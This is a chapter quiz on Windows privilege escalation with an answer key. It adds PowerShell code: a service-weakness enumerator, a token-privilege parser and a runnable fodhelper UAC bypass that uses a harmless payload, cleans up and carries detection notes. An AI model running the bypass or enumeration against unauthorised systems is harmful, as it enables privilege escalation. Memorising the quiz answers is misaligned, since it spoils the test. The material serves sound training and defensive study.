Chapter 16 Quiz: Windows Exploitation and Privilege Escalation
1. Which Windows privilege allows a service account to impersonate client tokens and is the prerequisite for Potato-family attacks?
A) SeDebugPrivilege B) SeImpersonatePrivilege C) SeBackupPrivilege D) SeTakeOwnershipPrivilege
2. A service has the following unquoted path: C:\Program Files\Custom App\Service Manager\svc.exe. In what order does Windows attempt to resolve this?
A) C:\Program.exe, C:\Program Files\Custom.exe, C:\Program Files\Custom App\Service.exe, then the full path
B) The full path only
C) svc.exe in the current directory, then the full path
D) C:\Program Files\Custom App\Service Manager\svc.exe only
3. What does the whoami /priv command display?
A) All users on the system B) Current user's file permissions C) Current user's Windows privileges and their states D) Current user's password hash
4. Which automated tool is the Windows equivalent of LinPEAS?
A) Nmap B) WinPEAS C) Bloodhound D) Mimikatz
5. The AlwaysInstallElevated registry key must be set to 1 in which locations to be exploitable?
A) HKLM only B) HKCU only C) Both HKLM and HKCU D) Neither; it is exploitable whenever the Windows Installer service exists
6. What is the primary attack that exploits SeImpersonatePrivilege on modern Windows systems?
A) Pass-the-Hash B) Kerberoasting C) PrintSpoofer or GodPotato D) DLL hijacking
7. HiveNightmare (CVE-2021-36934) allows standard users to read which critical files?
A) The Windows Event Logs B) SAM, SYSTEM, and SECURITY registry hives via Volume Shadow Copies C) The Active Directory database (NTDS.dit) D) Group Policy Objects in SYSVOL
8. Which Windows integrity level indicates a process is running with elevated administrator privileges?
A) Low Mandatory Level B) Medium Mandatory Level C) High Mandatory Level D) System Mandatory Level
9. In DLL hijacking, which of the following is the FIRST location Windows searches for a DLL (with SafeDllSearchMode enabled)?
A) The current working directory B) The Windows system directory (System32) C) The directory from which the application loaded D) Directories listed in the PATH environment variable
10. PrintNightmare (CVE-2021-34527) exploited a vulnerability in which Windows service?
A) Task Scheduler B) Windows Update C) Print Spooler D) Remote Desktop
11. You discover a service running as SYSTEM whose binary is writable by your user. What is the exploitation approach?
A) Modify the binary's configuration file B) Replace the binary with a payload, then restart the service C) Inject code into the running service process D) Change the service's start type to disabled
12. PowerUp's Invoke-AllChecks function performs which of the following?
A) Exploits all found vulnerabilities automatically B) Runs all privilege escalation enumeration checks and reports findings C) Patches all discovered vulnerabilities D) Creates a new administrator account
13. Which UAC bypass technique abuses the fodhelper.exe auto-elevation behavior?
A) Modifying the HKCU registry key ms-settings\Shell\Open\command to execute arbitrary commands
B) Injecting a DLL into the fodhelper.exe process
C) Replacing fodhelper.exe with a malicious binary
D) Using fodhelper.exe to load a kernel driver
14. A user account has SeDebugPrivilege enabled. What is the most impactful exploitation technique?
A) Reading registry keys B) Injecting code into SYSTEM-level processes like lsass.exe or winlogon.exe C) Modifying service configurations D) Creating scheduled tasks
15. Which of the following best describes the function of AMSI (Antimalware Scan Interface)?
A) A firewall component that blocks network-based attacks B) A scan interface that inspects PowerShell, VBScript, and JScript content before execution C) An encryption mechanism for stored credentials D) A kernel-level exploit mitigation technology
16. When performing Windows privilege escalation enumeration, which command reveals stored credentials that can be used with runas /savecred?
A) net user
B) cmdkey /list
C) reg query HKLM\SAM
D) whoami /groups
17. What is the key difference between WinPEAS and Seatbelt?
A) WinPEAS is for Linux; Seatbelt is for Windows B) WinPEAS focuses on privilege escalation vectors; Seatbelt focuses on broader security posture enumeration C) Seatbelt requires administrator privileges; WinPEAS does not D) WinPEAS is written in PowerShell; Seatbelt is a bash script
18. You have a shell as NT AUTHORITY\NETWORK SERVICE. Which privilege do you most likely have that enables Potato attacks?
A) SeShutdownPrivilege B) SeImpersonatePrivilege C) SeRemoteShutdownPrivilege D) SeChangeNotifyPrivilege
Answer Key
- B - SeImpersonatePrivilege allows impersonating client tokens and is required for Potato attacks.
- A - Windows tries each space-delimited interpretation in order: C:\Program.exe, then C:\Program Files\Custom.exe, then C:\Program Files\Custom App\Service.exe, then the full path as written. The misconfiguration is only exploitable if your user can create a file in one of the earlier directories (C:\ or C:\Program Files\Custom App here) and the service can be restarted or the host rebooted; by default standard users cannot create files in C:\ or under C:\Program Files, so check the ACLs rather than assuming.
- C - whoami /priv displays the current user's Windows privileges and whether each is Enabled or Disabled.
- B - WinPEAS is the Windows counterpart to LinPEAS for automated privilege escalation enumeration.
- C - AlwaysInstallElevated must be set to 1 in both HKLM and HKCU to be exploitable.
- C - PrintSpoofer and GodPotato are modern exploits for SeImpersonatePrivilege on current Windows versions.
- B - HiveNightmare allows reading SAM, SYSTEM, and SECURITY registry hive backups through Volume Shadow Copies.
- C - High Mandatory Level indicates an elevated administrator process.
- C - The application's own directory is searched first (after already-loaded modules and the KnownDLLs list, which never touch the file system). SafeDllSearchMode only moves the current working directory from second to fifth place, behind System32, the 16-bit system directory and the Windows directory; it does not change where the search starts, which is why a writable application directory is the classic hijack location.
- C - PrintNightmare exploited vulnerabilities in the Windows Print Spooler service.
- B - Replace the writable service binary with a payload (keep a copy of the original so the service can be restored), then restart the service so the payload runs as SYSTEM. Restarting needs stop/start rights on the service object; if you lack them and the service is set to auto-start, a reboot triggers the same result.
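The two service checks above (the unquoted-path resolution order from question 2 and the writable service binary from question 11) share the same "can my user write here?" test, so here they are together as one added example. This is editor-written code, not code from the chapter, PowerUp or WinPEAS; function names are my own, and it assumes you run it as the low-privileged user being assessed (Win32_Service and Get-Acl on service binaries are readable without admin rights).

```powershell
# Added example (not from the chapter): enumerate services for (a) unquoted
# ImagePaths with spaces and (b) binaries or binary directories the current
# user can write to. Run as the low-privileged user you are assessing.

function Get-UnquotedPathCandidates {
    # Reproduce CreateProcess's handling of an unquoted command line: every
    # prefix ending at a space is tried as "<prefix>.exe", in order, before
    # the path as written.
    param([Parameter(Mandatory)][string]$ImagePath)
    $exe   = ($ImagePath -split '(?<=\.exe)', 2)[0]    # drop arguments after .exe
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
    $candidates += $exe
    return $candidates
}

function Test-WritableByCurrentUser {
    # True if an Allow ACE for the current user or one of its groups grants
    # WriteData (which is CreateFiles on a directory). Deny ACEs are not
    # evaluated here, so confirm a hit by actually creating a file.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $id       = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids     = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $writeBit = [int][System.Security.AccessControl.FileSystemRights]::WriteData
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # unresolvable (orphaned) identity
        if (($sids -contains $sid) -and (([int]$ace.FileSystemRights) -band $writeBit)) { return $true }
    }
    return $false
}

function Find-ServiceBinaryWeaknesses {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        $exe = if ($path -match '^"([^"]+)"') { $Matches[1] } else { ($path -split '(?<=\.exe)', 2)[0] }

        # (a) unquoted path: a writable parent of any candidate tried before the real binary
        if ($path -notmatch '^"' -and $exe -match ' ') {
            foreach ($cand in Get-UnquotedPathCandidates $path) {
                if ($cand -eq $exe) { break }
                $dir = Split-Path -Path $cand -Parent
                if (Test-WritableByCurrentUser $dir) {
                    [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Finding = "unquoted path: can plant $cand" }
                }
            }
        }
        # (b) writable binary (replace it) or writable binary directory (DLL planting)
        if (Test-WritableByCurrentUser $exe) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Finding = "binary writable: $exe" }
        } elseif (Test-WritableByCurrentUser (Split-Path -Path $exe -Parent)) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Finding = "binary directory writable: $(Split-Path -Path $exe -Parent)" }
        }
    }
}

# Offline check of the resolution order for the path in question 2:
Get-UnquotedPathCandidates 'C:\Program Files\Custom App\Service Manager\svc.exe'
# Live enumeration on the host:
Find-ServiceBinaryWeaknesses | Format-Table -AutoSize
```

Only findings whose RunsAs column is LocalSystem (or another privileged account) are worth pursuing, and a hit from the ACL test still has to be proven by writing a file, because the function ignores Deny ACEs and ImagePath values in forms such as `\??\C:\...` are not normalised.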
- B - Invoke-AllChecks runs all enumeration checks and reports findings for manual exploitation.
- A - The fodhelper bypass creates HKCU\Software\Classes\ms-settings\Shell\Open\command with an empty DelegateExecute value and sets its default value to the command to run; because fodhelper.exe is auto-elevated and resolves that handler from the per-user hive, the command runs at High integrity without a prompt. It only works for a member of the Administrators group running a filtered (Medium-integrity) token with UAC below "Always notify".
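The fodhelper bypass described in the answer above, as an added, editor-written example rather than code from the chapter: it checks the preconditions, fires the bypass with a harmless payload, and removes the registry key again. Function names and the default payload (an elevated cmd.exe that runs whoami /groups so you can see the High Mandatory Level line) are my own; it assumes the target build still auto-elevates fodhelper.exe.

```powershell
# Added example (not from the chapter): fodhelper UAC bypass with precondition
# check and cleanup. Assumes a filtered admin token at Medium integrity and
# UAC at its default level.

function Test-FodhelperPreconditions {
    $groups = whoami /groups
    # In a filtered admin token the Administrators SID is present but deny-only.
    $adminLine = ($groups | Select-String -SimpleMatch 'S-1-5-32-544').Line
    $isFilteredAdmin = [bool]($adminLine -and ($adminLine -match 'deny only'))
    $integrity = (($groups | Select-String 'Mandatory Level').Line -replace '.*?(Low|Medium|High|System) Mandatory Level.*', '$1')
    [pscustomobject]@{ FilteredAdmin = $isFilteredAdmin; Integrity = $integrity }
}

function Invoke-FodhelperBypass {
    param([string]$Command = "$env:windir\System32\cmd.exe /k whoami /groups")
    $key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    # fodhelper.exe opens an ms-settings: URI at start-up. With an empty
    # DelegateExecute value present, the shell falls back to the (Default)
    # command under this HKCU key, and the auto-elevated process runs it.
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name DelegateExecute -Value '' -PropertyType String -Force | Out-Null
    Set-Item -Path $key -Value $Command
    Start-Process -FilePath "$env:windir\System32\fodhelper.exe" -WindowStyle Hidden
    Start-Sleep -Seconds 3
    # Clean up: the key is an indicator of compromise and a persistence hook
    # for anyone else on the host. HKCU\...\ms-settings does not exist by default.
    Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
}

$pre = Test-FodhelperPreconditions
if ($pre.FilteredAdmin -and $pre.Integrity -eq 'Medium') {
    Invoke-FodhelperBypass
} else {
    $pre   # not a candidate: either not an admin, or already elevated
}
```

On the defensive side this is easy to see: Sysmon Event ID 13 (registry value set) on HKCU\Software\Classes\ms-settings\Shell\Open\command, followed by fodhelper.exe spawning a non-Settings child process, is the whole story in two events, and Microsoft Defender flags the pattern outright.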
- B - SeDebugPrivilege lets you open any process for full access regardless of its DACL, so you can inject into or dump SYSTEM processes such as lsass.exe or winlogon.exe. It must be Enabled in the token (administrators usually hold it Disabled until a tool enables it), and it does not override LSA protection (RunAsPPL), which blocks handle access to a protected lsass.exe even from SYSTEM.
- B - AMSI hands script content (PowerShell, VBScript, JScript, and also .NET assemblies loaded in memory, WMI and Office VBA macros) to the registered antimalware provider at execution time, after any obfuscation has been unwrapped, so the scanner sees the decoded content rather than the file on disk.
- B - cmdkey /list shows credentials stored in the Windows Credential Manager that are usable with runas /savecred.
- B - WinPEAS focuses specifically on privilege escalation; Seatbelt provides broader security posture assessment.
- B - NETWORK SERVICE typically has SeImpersonatePrivilege, enabling Potato-family attacks.
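Questions 1, 3, 14 and 18 all come down to reading the token's privilege list from whoami /priv and knowing which entries matter. The following parser is an added example written for this page, not code from the chapter; the function name and the impact table are my own, and the regex assumes the English output format of whoami.

```powershell
# Added example (not from the chapter): parse whoami /priv into objects and
# annotate the privileges that lead directly to SYSTEM or to credential access.

function Get-TokenPrivilegeFindings {
    # High-impact privileges and the class of attack each enables.
    $interesting = @{
        'SeImpersonatePrivilege'        = 'Potato family (PrintSpoofer, GodPotato) -> SYSTEM'
        'SeAssignPrimaryTokenPrivilege' = 'Potato family -> SYSTEM'
        'SeDebugPrivilege'              = 'inject into or dump SYSTEM processes (lsass.exe, winlogon.exe)'
        'SeBackupPrivilege'             = 'read any file, e.g. SAM/SYSTEM hives'
        'SeRestorePrivilege'            = 'write any file, e.g. replace a service binary'
        'SeTakeOwnershipPrivilege'      = 'take ownership of files or keys, then grant yourself access'
        'SeLoadDriverPrivilege'         = 'load a kernel driver'
    }
    $findings = @()
    foreach ($line in (whoami /priv)) {
        # Data lines: "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled"
        if ($line -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            $name   = $Matches[1]
            $impact = if ($interesting.ContainsKey($name)) { $interesting[$name] } else { $null }
            $findings += [pscustomobject]@{
                Privilege = $name
                State     = $Matches[3]
                Impact    = $impact
            }
        }
    }
    return $findings
}

# Everything present in the token, high-impact entries first:
Get-TokenPrivilegeFindings | Sort-Object { $null -eq $_.Impact }, Privilege | Format-Table -AutoSize
```

A privilege listed as Disabled is still held: it is not in effect for the current process, but any tool can enable it with AdjustTokenPrivileges, which is what the Potato exploits and process-injection tools do before use. A privilege that is absent from the list cannot be enabled at all, so a NETWORK SERVICE shell should show SeImpersonatePrivilege here before you reach for PrintSpoofer or GodPotato.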